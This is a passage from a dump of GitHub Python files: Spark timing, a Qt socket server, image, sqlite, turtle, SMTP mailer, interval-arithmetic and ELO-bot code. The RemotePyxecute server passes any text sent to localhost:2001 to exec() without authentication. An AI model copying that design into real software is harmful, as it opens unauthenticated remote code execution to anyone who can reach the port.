get number of citations per state on Christmas\n rdd.keyBy(lambda x: x.split(',')[2]).countByKey()\n\n end = time.time()\n \n return end - start\n\n\n\n\n# lists to store times\nt1 = []\nt2 = []\n\nr = range(1,11) \nfor num in r :\n print(\"Iteration #\", num)\n \n #time execution without persistence\n time1 = time_rdd(file, False)\n t1.append(time1)\n \n # time execution with persistence\n time2 = time_rdd(file,True)\n t2.append(time2)\n\n \n\n######################################################################\n# Compare execution times with and without persistence\n######################################################################\n \n\n# import libraries for plotting\nimport matplotlib.pyplot as plt\nimport pandas as pd\n \n# Data\ndf=pd.DataFrame({'num': r, 't1': t1, 't2': t2})\n \n# multiple line plot\nplt.plot( 'num', 't1', data=df, color='blue', label = 'persistence=no')\nplt.plot( 'num', 't2', data=df, marker='', color='maroon', label = 'persistence=yes')\nplt.xlabel(\"iteration #\")\nplt.ylabel(\"time (seconds)\")\n\nplt.legend()\n\n\n# stop the Spark Context\nsc.stop()\n\n\n\n\n\n\n\n\n\n","repo_name":"gdancik/CSC-343","sub_path":"data/notes/persist.py","file_name":"persist.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"15667941800","text":"from __future__ import annotations\n\nimport asyncore\nimport logging\nimport traceback\n\nfrom . import logger\nfrom Qt import QtCore\n\n\nclass ThreadBridgeReceiver(QtCore.QObject):\n response = QtCore.Signal(str)\n\nclass ThreadResponder(QtCore.QObject):\n response = QtCore.Signal(str)\n\n\nclass Server(asyncore.dispatcher):\n \"\"\"\n Receives connections and establishes handlers for each client.\n \"\"\"\n\n def __init__(self, address: tuple[str, int], thread:ServerThread) -> None:\n super().__init__()\n self.thread = thread\n self.logger.log_to(\"Server\")\n self.response_handler = None\n self.create_socket()\n self.bind(address)\n _address = self.socket.getsockname()\n self.logger.log_to(f\"binding to {_address}\")\n self.listen(1)\n\n @property\n def logger(self):\n if not hasattr(self, \"_logger\"):\n self._logger = self.thread.logger#\n\n return self._logger\n\n def handle_accepted(self, sock, address) -> None:\n self.logger.log_to(\"handle_accepted()\")\n self.logger.log_to(f\"[Server] Connection from: {address}\")\n self.response_handler = ResponseHandler(sock, self.thread)\n\n def handle_close(self) -> None:\n self.logger.log_to(\"Shutting down Server\")\n if self.response_handler:\n self.response_handler.handle_close()\n self.close()\n self.logger.log_to(\"Server shut down\")\n\n\nclass ResponseHandler(asyncore.dispatcher):\n \"\"\"\n Handles responding to messages from a single client.\n \"\"\"\n\n def __init__(self, socket, thread: ServerThread, chunk_size: int = 4096):\n\n self.thread = thread\n self.thread.response.connect(self.on_response)\n self.logger.log_to(\"ResponseHandler\")\n self.logger.log_to(f\"ResponseHandler: {socket.getsockname()}\")\n self.chunk_size = chunk_size\n super().__init__(socket)\n self.response_data: bytes = b\"\"\n\n @property\n def logger(self):\n if not hasattr(self, \"_logger\"):\n self._logger = self.thread.logger#\n\n return self._logger\n\n @QtCore.Slot(str)\n def on_response(self, data: str):\n self.logger.log_to(\"on_response\")\n self.response_data = bytes(f\"{data}<< {self.response_data}\")\n return bool(self.response_data)\n\n def handle_write(self):\n \"\"\"\n Write as much as possible of the most recent message we have received.\n \"\"\"\n\n data = self.response_data\n sent = self.send(data)\n if sent < len(data):\n self.response_data = data[sent:]\n\n # self.logger.log_to('handle_write() -> (%d) \"%s\"', sent, data[:sent])\n # if not self.writable():\n # self.handle_close()\n\n def handle_read(self):\n \"\"\"\n Read an incoming message from the client and put it into our outgoing queue.\n \"\"\"\n\n self.logger.log_to(\"handle_read()\")\n data = self.recv(self.chunk_size)\n data = str(data, encoding=\"ascii\")\n self.logger.log_to(f\"data: {data}\")\n # if data.endswith(\"<< ({len(_data)}) '{_data}'\"\n )\n\n def handle_close(self):\n self.logger.log_to(\"Shutting down ResponseHandler\")\n self.close()\n self.thread.response.disconnect(self.on_response)\n\n\nclass ServerThread(QtCore.QThread):\n \"\"\"\n Thread to run the asyncore.loop on.\n\n This prevents the interpreter the server is running on\n from being blocked.\n It is currently a QThread to make use of signals and\n slots. These allow for thread safe communication as the\n received data needs to be executed in the main thread.\n \"\"\"\n\n received = QtCore.Signal(str)\n response = QtCore.Signal(str)\n\n def __init__(self, address: tuple[str, int]):\n super().__init__()\n self.logger = logger.get_logger(\"ServerThread\")\n # self.logger.enable_file_log(logging.DEBUG)\n self.logger.log_to(\"ServerThread\")\n self.server = Server(address, self)\n self.received.connect(self.on_received)\n\n def run(self):\n asyncore.loop()\n\n def stop(self):\n self.server.handle_close()\n\n @QtCore.Slot(str)\n def on_received(self, data:str):\n try:\n self.logger.log_to(f\"Received data:\\n'{data}'\")\n exec(data)\n except Exception:\n _traceback = traceback.format_exc()\n self.logger.log_to(\"Exception occured:\\n{_traceback}\")\n self.response.emit(_traceback)\n return\n\n self.response.emit(\"SUCCESS\")\n\n\nif __name__ == \"__main__\":\n\n try:\n st.stop()\n except: pass\n st = ServerThread((\"localhost\", 2001))\n st.start()\n # st.response.emit(\"SUCCESS\")","repo_name":"munkybutt/RemotePyxecute","sub_path":"src/remote_pyxecute/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"42251323363","text":"__author__ = 'heeckhau'\n\nimport sys\nfrom PIL import Image\n\n#create gallery image from input\n\ndef create_gallery_image(input_image, gallery_thumbnail_path):\n background = Image.open(\"images/others/stack_200_16.png\")\n moz = Image.open(input_image)\n\n # 16 + 168 + 16\n\n sq_size = min(moz.size)\n box_x = (moz.size[0]-sq_size)/2\n box_y = (moz.size[1]-sq_size)/2\n sq_box = (box_x, box_y, box_x + sq_size, box_y + sq_size)\n\n square_moz = moz.crop(sq_box)\n #square_moz.save(\"tmp1.png\")\n\n resize_moz = square_moz.resize((168,168))\n #resize_moz.save(\"tmp2.png\")\n\n box = (16, 16, 16 + 168, 16 + 168)\n\n background.paste(resize_moz, box)\n\n new_file = gallery_thumbnail_path\n print(new_file)\n\n background.save(new_file)\n\nif __name__ == \"__main__\":\n input_image = sys.argv[1]\n if not os.path.isfile(input_image):\n raise \"Incorrect input\"\n\n create_gallery_image(input_image)\n\n\n\n","repo_name":"heeckhau/www.anneliesbuyssens.be","sub_path":"_python/create_gallery_image.py","file_name":"create_gallery_image.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19347396425","text":"# This example taken from the sqlite3 documentation at https://docs.python.org/3/library/sqlite3.html\n#\n\nimport sqlite3\nfrom sqlite3.dbapi2 import Connection, Cursor\n\n# Create a temporary database in memory.\nconn : Connection = sqlite3.connect(':memory:')\n# More usual is to have a database file, e.g.\n# conn = sqlite3.connect('example.db')\n\nc : Cursor = conn.cursor()\n\n# Create table\nc.execute('''CREATE TABLE stocks\n(date text, trans text, symbol text, qty real, price real)''')\n\n# Insert a row of data\nc.execute(\"\"\"INSERT INTO stocks\n VALUES ('2006-01-05','BUY','RHAT',100,35.14)\"\"\")\n\n\n# Larger example that inserts many records at a time\npurchases = [('2006-03-28', 'BUY', 'IBM', 1000, 45.00),\n ('2006-04-05', 'BUY', 'MSFT', 1000, 72.00),\n ('2006-04-06', 'SELL', 'IBM', 500, 53.00),\n ]\nc.executemany('INSERT INTO stocks VALUES (?,?,?,?,?)', purchases)\n\n# Save (commit) the changes\nconn.commit()\n\n# We can also close the cursor if we are done with it\nc.close()\n\n# Now retreive the data\nc = conn.cursor()\nc.execute('SELECT * FROM stocks ORDER by price')\nfor row in c:\n print(row)\n\nc.close()\nconn.close()\n","repo_name":"ExeterBScDTS/ECM2429-sqlite","sub_path":"lesson-01/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9332182053","text":"from turtle import Turtle, Screen\nimport turtle\nfrom itertools import cycle\nfrom random import shuffle\nimport tkinter\nimport time\nturtle.clearscreen()\n\ndef _dibujar_torta(pincel, radio, datos):\n \"\"\"Esta función se encarga de dibujar la torta. Recibe un pincel(Turtle), el radio del circulo y\n los datos a dibujar.\"\"\"\n\n colores = [\"#8251FA\", \"#FA60C8\", \"#FA5262\", \"#FAA039\", \"#FAF40C\", \"#A4FA72\", \"#74FABC\", \"#77B8FA\", \"#4F5EFA\",\n \"#FA1D38\"]\n\n shuffle(colores)\n ciclo_colores = cycle(colores) # colores en hex\n\n pincel.penup()\n pincel.sety(-radio)\n pincel.pendown()\n\n total = sum(fraccion for _, fraccion in datos) # data doesn't sum to 100 so adjust\n\n for _, fraccion in datos: # _, ignora etiqueta al desempaquetar los datos de la tupla.\n color = next(ciclo_colores)\n pincel.pencolor(color)\n pincel.fillcolor(color)\n pincel.begin_fill()\n pincel.circle(radio, fraccion * 360 / total)\n posicion = pincel.position()\n pincel.goto(0, 0)\n pincel.end_fill()\n pincel.setposition(posicion)\n\n\ndef _dibujar_etiquetas(pincel, radio, datos):\n \"\"\"Esta función se encarga de dibujar las etiquetas para cada porción de la torta.\n Recibe un pincel(Turtle), el radio del circulo, los datos y un total\"\"\"\n\n total = sum(fraccion for _, fraccion in datos) # data doesn't sum to 100 so adjust\n\n radio_etiqueta = radio * 1.33\n tamaño_fuente = 18\n fuente = (\"Ariel\", tamaño_fuente, \"bold\")\n\n pincel.penup()\n pincel.sety(-radio_etiqueta)\n\n for etiqueta, fraccion in datos:\n pincel.circle(radio_etiqueta, fraccion * 360 / total / 2)\n pincel.write(etiqueta, align=\"center\", font=fuente)\n pincel.circle(radio_etiqueta, fraccion * 360 / total / 2)\n\n\ndef dibujar_grafico_torta(datos, radio=200,tiempo=3):\n \"\"\"Esta función recibe en datos una lista de tuplas, donde cada tupla tiene una etiquta y un valor a graficar en\n la torta. El radio por defecto es 200\n Los parametros tienen que respetar una estructura como la siguiente:\n datos = (lista de tuplas) [(\"A\",50),(\"B\",23),(\"C\",231),(\"D\",4),(\"E\",5)]\n radio = (entero) 1,2,3,4..N -->corresponde al radio de la circunferencia del grafico\n tiempo = (entero) 1,2,3,4,5..N --> referencia el tiempo en segundos en el cual va a tardar en mostrar el grafico antes de poder eliminarlo\n Para usar la función se debe invocarla en el programa principal con los datos y el radio deseado\n \n Ejemplo de ejecucion:\n\n dibujar_grafico_torta([(\"A\",50),(\"B\",23),(\"C\",231),(\"D\",4),(\"E\",5)],150)\n \"\"\"\n\n turtle.clearscreen()\n\n pincel = Turtle()\n pincel.speed(10)\n ventana = Screen()\n _dibujar_torta(pincel, radio, datos)\n pincel.pencolor(\"black\")\n _dibujar_etiquetas(pincel, radio, datos)\n #ventana.exitonclick()\n tkinter.mainloop(30000000)\n time.sleep(tiempo)\n","repo_name":"ucuraj/graficos_tortuga","sub_path":"grafico_de_torta.py","file_name":"grafico_de_torta.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16547437240","text":"\"\"\"\nPython3 script to send mail with multiple csvs attached (smtp) from outlook account\n\"\"\"\nimport sys\nimport csv\nimport smtplib\nimport os\nimport glob\nfrom datetime import datetime\n#import automationassets\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nfrom email.mime.text import MIMEText\nfrom email.utils import COMMASPACE\nfrom email import encoders\n\n\n#to get the current filepath\n#print(os.path.dirname(os.path.abspath(__file__)))\n#print(os.listdir())\n\n#glob - to catch all file in location of script located\ncsvlist = list()\nfor file in glob.glob(\"*.csv\"):\n csvlist.append(file)\n# print(csvlist)\n\n#declare name and password credentials \nname = mail \npassw = password\n\nsender = name\nreceiver = ['sxxx@outlook.com']\nsmtpsrv = \"smtp.office365.com\"\n\nSUBJECT = 'Status'.format(datetime.now().strftime('%Y-%m-%d-%H:%M:%S'))\nFILEPATH = os.path.dirname(os.path.abspath(__file__))\n\nmsg = MIMEMultipart()\nmsg['From'] = sender\nmsg['To'] = COMMASPACE.join(receiver)\nmsg['Subject'] = SUBJECT\nbody =\"\"\"schedule are processed successfully.\n\"\"\" \nbody = MIMEText(body)\nmsg.attach(body)\n\n#attach multiple csvs to mail\nfor f in csvlist:\n file_path = os.path.join(FILEPATH, f)\n part = MIMEBase('application', \"octet-stream\")\n part.set_payload(open(file_path, \"rb\").read())\n encoders.encode_base64(part)\n part.add_header('Content-Disposition', 'attachment', filename=f) # or\n msg.attach(part)\n\n#declare smtpserver\nsmtpserver = smtplib.SMTP(smtpsrv,587)\nsmtpserver.ehlo()\nsmtpserver.starttls()\nsmtpserver.ehlo\nsmtpserver.login(sender, passw)\nsmtpserver.sendmail(sender, receiver, msg.as_string())\nprint('Successfully sent mail')\nsmtpserver.close()\n","repo_name":"swezphyo/python_castle","sub_path":"python_chamber/send_mail_with_csv.py","file_name":"send_mail_with_csv.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74209896222","text":"from __future__ import print_function\n\nINT_EQ = 0 # Equivalent\nINT_B_IN_A = 1 # B in A\nINT_A_IN_B = -1 # A in B\nINT_DISJOIN = 2 # Disjoint\nINT_JOIN = 3 # Overlap\nINT_JOIN_AB = 4 # B starts at the end of A\nINT_JOIN_BA = 5 # A starts at the end of B\n\n\ndef cmp_interval(inter1, inter2):\n \"\"\"Compare @inter1 and @inter2 and returns the associated INT_* case\n @inter1, @inter2: interval instance\n \"\"\"\n if inter1 == inter2:\n return INT_EQ\n\n inter1_start, inter1_stop = inter1\n inter2_start, inter2_stop = inter2\n result = INT_JOIN\n if inter1_start <= inter2_start and inter1_stop >= inter2_stop:\n result = INT_B_IN_A\n if inter2_start <= inter1_start and inter2_stop >= inter1_stop:\n result = INT_A_IN_B\n if inter1_stop + 1 == inter2_start:\n result = INT_JOIN_AB\n if inter2_stop + 1 == inter1_start:\n result = INT_JOIN_BA\n if inter1_start > inter2_stop + 1 or inter2_start > inter1_stop + 1:\n result = INT_DISJOIN\n return result\n\n\nclass interval(object):\n \"\"\"Stands for intervals with integer bounds\n\n Offers common methods to work with interval\"\"\"\n\n def __init__(self, bounds=None):\n \"\"\"Instance an interval object\n @bounds: (optional) list of (int, int) and/or interval instance\n \"\"\"\n if bounds is None:\n bounds = []\n elif isinstance(bounds, interval):\n bounds = bounds.intervals\n self.is_cannon = False\n self.intervals = bounds\n self.cannon()\n\n def __iter__(self):\n \"\"\"Iterate on intervals\"\"\"\n for inter in self.intervals:\n yield inter\n\n @staticmethod\n def cannon_list(tmp):\n \"\"\"\n Return a cannonizes list of intervals\n @tmp: list of (int, int)\n \"\"\"\n tmp = sorted([x for x in tmp if x[0] <= x[1]])\n out = []\n if not tmp:\n return out\n out.append(tmp.pop())\n while tmp:\n x = tmp.pop()\n rez = cmp_interval(out[-1], x)\n\n if rez == INT_EQ:\n continue\n elif rez == INT_DISJOIN:\n out.append(x)\n elif rez == INT_B_IN_A:\n continue\n elif rez in [INT_JOIN, INT_JOIN_AB, INT_JOIN_BA, INT_A_IN_B]:\n u, v = x\n while out and cmp_interval(out[-1], (u, v)) in [\n INT_JOIN, INT_JOIN_AB, INT_JOIN_BA, INT_A_IN_B]:\n u = min(u, out[-1][0])\n v = max(v, out[-1][1])\n out.pop()\n out.append((u, v))\n else:\n raise ValueError('unknown state', rez)\n return out[::-1]\n\n def cannon(self):\n \"Apply .cannon_list() on self contained intervals\"\n if self.is_cannon is True:\n return\n self.intervals = interval.cannon_list(self.intervals)\n self.is_cannon = True\n\n def __repr__(self):\n if self.intervals:\n o = \" U \".join([\"[0x%X 0x%X]\" % (x[0], x[1])\n for x in self.intervals])\n else:\n o = \"[]\"\n return o\n\n def __contains__(self, other):\n if isinstance(other, interval):\n for intervalB in other.intervals:\n is_in = False\n for intervalA in self.intervals:\n if cmp_interval(intervalA, intervalB) in [INT_EQ, INT_B_IN_A]:\n is_in = True\n break\n if not is_in:\n return False\n return True\n else:\n for intervalA in self.intervals:\n if intervalA[0] <= other <= intervalA[1]:\n return True\n return False\n\n def __eq__(self, i):\n return self.intervals == i.intervals\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def union(self, other):\n \"\"\"\n Return the union of intervals\n @other: interval instance\n \"\"\"\n\n if isinstance(other, interval):\n other = other.intervals\n other = interval(self.intervals + other)\n return other\n\n def difference(self, other):\n \"\"\"\n Return the difference of intervals\n @other: interval instance\n \"\"\"\n\n to_test = self.intervals[:]\n i = -1\n to_del = other.intervals[:]\n while i < len(to_test) - 1:\n i += 1\n x = to_test[i]\n if x[0] > x[1]:\n del to_test[i]\n i -= 1\n continue\n\n while to_del and to_del[0][1] < x[0]:\n del to_del[0]\n\n for y in to_del:\n if y[0] > x[1]:\n break\n rez = cmp_interval(x, y)\n if rez == INT_DISJOIN:\n continue\n elif rez == INT_EQ:\n del to_test[i]\n i -= 1\n break\n elif rez == INT_A_IN_B:\n del to_test[i]\n i -= 1\n break\n elif rez == INT_B_IN_A:\n del to_test[i]\n i1 = (x[0], y[0] - 1)\n i2 = (y[1] + 1, x[1])\n to_test[i:i] = [i1, i2]\n i -= 1\n break\n elif rez in [INT_JOIN_AB, INT_JOIN_BA]:\n continue\n elif rez == INT_JOIN:\n del to_test[i]\n if x[0] < y[0]:\n to_test[i:i] = [(x[0], y[0] - 1)]\n else:\n to_test[i:i] = [(y[1] + 1, x[1])]\n i -= 1\n break\n else:\n raise ValueError('unknown state', rez)\n return interval(to_test)\n\n def intersection(self, other):\n \"\"\"\n Return the intersection of intervals\n @other: interval instance\n \"\"\"\n\n out = []\n for x in self.intervals:\n if x[0] > x[1]:\n continue\n for y in other.intervals:\n rez = cmp_interval(x, y)\n\n if rez == INT_DISJOIN:\n continue\n elif rez == INT_EQ:\n out.append(x)\n continue\n elif rez == INT_A_IN_B:\n out.append(x)\n continue\n elif rez == INT_B_IN_A:\n out.append(y)\n continue\n elif rez == INT_JOIN_AB:\n continue\n elif rez == INT_JOIN_BA:\n continue\n elif rez == INT_JOIN:\n if x[0] < y[0]:\n out.append((y[0], x[1]))\n else:\n out.append((x[0], y[1]))\n continue\n else:\n raise ValueError('unknown state', rez)\n return interval(out)\n\n\n def __add__(self, other):\n return self.union(other)\n\n def __and__(self, other):\n return self.intersection(other)\n\n def __sub__(self, other):\n return self.difference(other)\n\n def hull(self):\n \"Return the first and the last bounds of intervals\"\n if not self.intervals:\n return None, None\n return self.intervals[0][0], self.intervals[-1][1]\n\n\n @property\n def empty(self):\n \"\"\"Return True iff the interval is empty\"\"\"\n return not self.intervals\n\n def show(self, img_x=1350, img_y=20, dry_run=False):\n \"\"\"\n show image representing the interval\n \"\"\"\n try:\n import Image\n import ImageDraw\n except ImportError:\n print('cannot import python PIL imaging')\n return\n\n img = Image.new('RGB', (img_x, img_y), (100, 100, 100))\n draw = ImageDraw.Draw(img)\n i_min, i_max = self.hull()\n\n print(hex(i_min), hex(i_max))\n\n addr2x = lambda addr: ((addr - i_min) * img_x) // (i_max - i_min)\n for a, b in self.intervals:\n draw.rectangle((addr2x(a), 0, addr2x(b), img_y), (200, 0, 0))\n\n if dry_run is False:\n img.show()\n\n @property\n def length(self):\n \"\"\"\n Return the cumulated length of intervals\n \"\"\"\n # Do not use __len__ because we may return a value > 32 bits\n return sum((stop - start + 1) for start, stop in self.intervals)\n","repo_name":"cea-sec/miasm","sub_path":"miasm/core/interval.py","file_name":"interval.py","file_ext":"py","file_size_in_byte":8511,"program_lang":"python","lang":"en","doc_type":"code","stars":3204,"dataset":"github-code","pt":"7"} +{"seq_id":"32866096276","text":"import datetime\n# import discord\n# import re\n# import psycopg2\nfrom peewee import *\nfrom playhouse.postgres_ext import *\n# import modules.exceptions as exceptions\nimport settings\nimport logging\n\nlogger = logging.getLogger('spiesbot.' + __name__)\nelo_logger = logging.getLogger('spiesbot.elo')\n\ndb = PostgresqlDatabase(settings.psql_db, autorollback=True, user=settings.psql_user, autoconnect=False)\n\n\ndef tomorrow():\n return (datetime.datetime.now() + datetime.timedelta(hours=24)).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\nclass BaseModel(Model):\n class Meta:\n database = db\n\n\nclass Player(BaseModel):\n discord_id = BitField(unique=True, null=False)\n name = TextField(unique=False)\n elo = SmallIntegerField(default=1000)\n elo_max = SmallIntegerField(default=1000)\n is_banned = BooleanField(default=False)\n\n def leaderboard_rank(self, date_cutoff):\n # Returns player's position in the leaderboard, and total size of leaderboard\n\n # TODO: This could be replaced with Postgresql Window functions to have the DB calculate the rank.\n # Advantages: Probably moderately more efficient, and will resolve ties in a sensible way\n # But no idea how to write the query :/\n # http://docs.peewee-orm.com/en/latest/peewee/query_examples.html#find-the-top-three-revenue-generating-facilities\n\n query = Player.leaderboard(date_cutoff=date_cutoff)\n\n player_found = False\n for counter, p in enumerate(query.tuples()):\n if p[0] == self.id:\n player_found = True\n break\n\n rank = counter + 1 if player_found else None\n return (rank, query.count())\n\n def wins(self):\n\n q = Game.select().where(\n (Game.is_confirmed == 1) & (Game.winning_player == self)\n )\n\n return q\n\n def losses(self):\n q = Game.select().where(\n (Game.is_confirmed == 1) & (Game.losing_player == self)\n )\n\n return q\n\n def get_record(self):\n\n return (self.wins().count(), self.losses().count())\n\n def leaderboard(date_cutoff, max_flag: bool = False):\n\n if max_flag:\n elo_field = Player.elo_max\n else:\n elo_field = Player.elo\n\n query = Player.select().join(PlayerGame).join(Game).where(\n (Game.is_confirmed == 1) & (Game.completed_ts > date_cutoff) & (Player.is_banned == 0)\n ).distinct().order_by(-elo_field)\n\n if query.count() < 10:\n # Include all registered players on leaderboard if not many games played\n query = Player.select().order_by(-elo_field)\n\n return query\n\n def string_matches(player_string: str):\n # Returns QuerySet containing players in current guild matching string. Searches against discord mention ID first, then exact discord name match,\n # then falls back to substring match on name/nick\n\n try:\n p_id = int(player_string.strip('<>!@'))\n except ValueError:\n pass\n else:\n # lookup either on <@####> mention string or raw ID #\n query_by_id = Player.select().where(\n (Player.discord_id == p_id)\n )\n if query_by_id.count() > 0:\n return query_by_id\n\n if len(player_string.split('#', 1)[0]) > 2:\n discord_str = player_string.split('#', 1)[0]\n # If query is something like 'Nelluk#7034', use just the 'Nelluk' to match against discord_name.\n # This happens if user does an @Mention then removes the @ character\n else:\n discord_str = player_string\n\n name_exact_match = Player.select(Player).where(\n (Player.name ** discord_str) # ** is case-insensitive\n )\n\n if name_exact_match.count() == 1:\n # String matches DiscordUser.name exactly\n return name_exact_match\n\n name_substring_match = PlayerGame.select(PlayerGame.player, fn.COUNT('*').alias('games_played')).join(Player).where(\n (Player.name.contains(player_string))\n ).group_by(PlayerGame.player).order_by(-SQL('games_played'))\n\n if name_substring_match.count() > 0:\n return [l.player for l in name_substring_match]\n\n return []\n\n\nclass Game(BaseModel):\n name = TextField(null=True)\n is_confirmed = BooleanField(default=False)\n win_claimed_ts = DateTimeField(default=datetime.datetime.now) # set when game is claimed/entered\n completed_ts = DateTimeField(null=True, default=None) # set when game is confirmed and ELO is calculated\n name = TextField(null=True)\n losing_score = SmallIntegerField(default=1, null=True) # Score of losing player, so assumed to be 0, 1, or 2. Assumed that basically all ranked games are first to 3 (3-0, 3-1, 3-2)\n losing_player = ForeignKeyField(Player, null=False, backref='losing_player', on_delete='RESTRICT')\n winning_player = ForeignKeyField(Player, null=False, backref='winning_player', on_delete='RESTRICT')\n elo_change_winner = SmallIntegerField(default=0)\n elo_change_loser = SmallIntegerField(default=0)\n\n def __setattr__(self, name, value):\n if name == 'name':\n value = value.strip('\\\"').strip('\\'').strip('”').strip('“').title()[:35].strip() if value else value\n return super().__setattr__(name, value)\n\n def refresh(self):\n # refresh object in memory with fresh copy from database\n\n return type(self).get(self._pk_expr())\n\n def get_or_create_pending_game(winning_player, losing_player, name=None, losing_score=None):\n game, created = Game.get_or_create(winning_player=winning_player, losing_player=losing_player, is_confirmed=False, defaults={'name': name, 'losing_score': losing_score})\n if created and losing_score is None:\n # Attempted to input a game with no losing score - not allowed\n game.delete_instance()\n return None, False\n if created:\n PlayerGame.create(player=winning_player, game=game)\n PlayerGame.create(player=losing_player, game=game)\n return game, created\n\n def confirm(self, bypass_check=False):\n # Calculate elo changes for a newly-confirmed game and write new values to database\n\n if self.is_confirmed and not bypass_check:\n # checks to make sure we aren't confirming an already-confirmed game.\n # if bypass_check=True, confirming will be allowed to continue even if is_confirmed is set.\n # This is probably only used in recalculate_all_elo\n raise ValueError('Cannot confirm game - is_confirmed is already marked as True')\n\n logger.debug(f'Confirming game {self.id}')\n elo_logger.debug(f'Confirm game {self.id}')\n\n winner_delta = self.calc_elo_delta(for_winner=True)\n loser_delta = self.calc_elo_delta(for_winner=False)\n\n with db.atomic() as transaction:\n elo_logger.debug(f'Winning player {self.winning_player.name} going from {self.winning_player.elo} to {int(self.winning_player.elo + winner_delta)}')\n self.winning_player.elo = int(self.winning_player.elo + winner_delta)\n if self.winning_player.elo > self.winning_player.elo_max:\n self.winning_player.elo_max = self.winning_player.elo\n self.elo_change_winner = winner_delta\n\n elo_logger.debug(f'Losing player {self.losing_player.name} going from {self.losing_player.elo} to {int(self.losing_player.elo + loser_delta)}')\n self.losing_player.elo = int(self.losing_player.elo + loser_delta)\n self.elo_change_loser = loser_delta\n\n self.winning_player.save()\n self.losing_player.save()\n self.is_confirmed = True\n self.completed_ts = datetime.datetime.now()\n\n for playergame in self.playergame:\n if playergame.player == self.winning_player:\n playergame.elo_after_game = self.winning_player.elo\n else:\n playergame.elo_after_game = self.losing_player.elo\n playergame.save()\n\n update_count = self.save()\n if not update_count:\n # Could happen if game is deleted while Game object is still in memory and then a confirm is attempted, usually if a user deletes a game during the auto-confirm time\n transaction.rollback()\n raise Game.DoesNotExist('Game can not be found. No ELO changes saved.')\n\n return self.winning_player.elo, self.losing_player.elo\n\n def calc_elo_delta(self, for_winner=True):\n max_elo_delta = 32 # elo 'k' value\n\n def chance_of_winning(target_elo, opponent_elo):\n # Calculate the expected chance of winning based on one player's elo compared to their opponent's elo.\n return round(1 / (1 + (10 ** ((opponent_elo - target_elo) / 400.0))), 3)\n\n # Calculate a base change of elo based on your chance of winning and whether or not you won\n if for_winner is True:\n elo = self.winning_player.elo\n elo_delta = int(round((max_elo_delta * (1 - chance_of_winning(target_elo=elo, opponent_elo=self.losing_player.elo))), 0))\n else:\n elo = self.losing_player.elo\n elo_delta = int(round((max_elo_delta * (0 - chance_of_winning(target_elo=elo, opponent_elo=self.winning_player.elo))), 0))\n\n elo_boost = .60 * ((1200 - max(min(elo, 1200), 900)) / 300) # 60% boost to delta at elo 900, gradually shifts to 0% boost at 1200 ELO\n\n elo_bonus = int(abs(elo_delta) * elo_boost)\n elo_delta += elo_bonus\n\n if self.losing_score == 0:\n elo_delta = int(round(elo_delta * 1.15)) # larger delta for a 3-0 blowout\n elif self.losing_score == 2:\n elo_delta = int(round(elo_delta * 0.85)) # smaller delta for a 3-2 close game\n\n return elo_delta\n\n def reverse_confirmation(self):\n # revert elo changes and return game to unconfirmed state\n self.winning_player.elo += self.elo_change_winner * -1\n self.winning_player.save()\n self.elo_change_winner = 0\n\n self.losing_player.elo += self.elo_change_loser * -1\n self.losing_player.save()\n self.elo_change_loser = 0\n\n for playergame in self.playergame:\n playergame.elo_after_game = None\n playergame.save()\n\n self.is_confirmed = False\n self.completed_ts = None\n\n self.save()\n\n def delete_game(self):\n # resets any relevant ELO changes to players and teams, deletes related lineup records, and deletes the game entry itself\n\n logger.info(f'Deleting game {self.id}')\n recalculate = False\n with db.atomic():\n if self.is_confirmed:\n self.is_confirmed = False\n recalculate = True\n since = self.completed_ts\n\n self.reverse_confirmation()\n\n for playergame in self.playergame:\n playergame.delete_instance()\n\n self.delete_instance()\n\n if recalculate:\n Game.recalculate_elo_since(timestamp=since)\n\n def recalculate_elo_since(timestamp):\n games = Game.select().where(\n (Game.is_confirmed == 1) & (Game.completed_ts >= timestamp)\n ).order_by(Game.completed_ts)\n\n elo_logger.debug(f'recalculate_elo_since {timestamp}')\n for g in games:\n g.reverse_confirmation()\n\n for g in games:\n g.confirm()\n elo_logger.debug(f'recalculate_elo_since complete')\n\n def recalculate_all_elo():\n # Reset all ELOs to 1000, and re-run Game.declare_winner() on all qualifying games\n\n logger.warn('Resetting and recalculating all ELO')\n elo_logger.info(f'recalculate_all_elo')\n\n with db.atomic():\n Player.update(elo=1000, elo_max=1000).execute()\n\n games = Game.select().where(\n (Game.is_confirmed == 1)\n ).order_by(Game.completed_ts)\n\n for game in games:\n game.confirm(bypass_check=True)\n\n elo_logger.info(f'recalculate_all_elo complete')\n\n\nclass PlayerGame(BaseModel):\n player = ForeignKeyField(Player, null=False, backref='playergame', on_delete='RESTRICT')\n game = ForeignKeyField(Game, null=False, backref='playergame', on_delete='CASCADE')\n elo_after_game = SmallIntegerField(default=None, null=True) # snapshot of what elo was after game concluded\n\n\nwith db:\n db.create_tables([Player, Game, PlayerGame])\n","repo_name":"Nelluk/Two-Spies-ELO-Bot","sub_path":"modules/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73309998944","text":"\nfrom sql_operator_folder.sql_operator import SqlOperator\n\nobj_sql_op = SqlOperator()\n\n\nclass AddAttendanceFunc:\n\n def add_attendance_func(self, employee_list, enter_date):\n\n for i in range(len(employee_list)):\n\n print(f\"Enter attendance for ID:{employee_list[i][0]} & Name:{employee_list[i][1]}\")\n attendance = input(\"Enter p for Present or a for Absent\")\n sql_attendance_query = \" INSERT INTO attendance_details(Date, Employee_ID, Attendance) VALUES (%s, %s, %s)\"\n values = (enter_date, 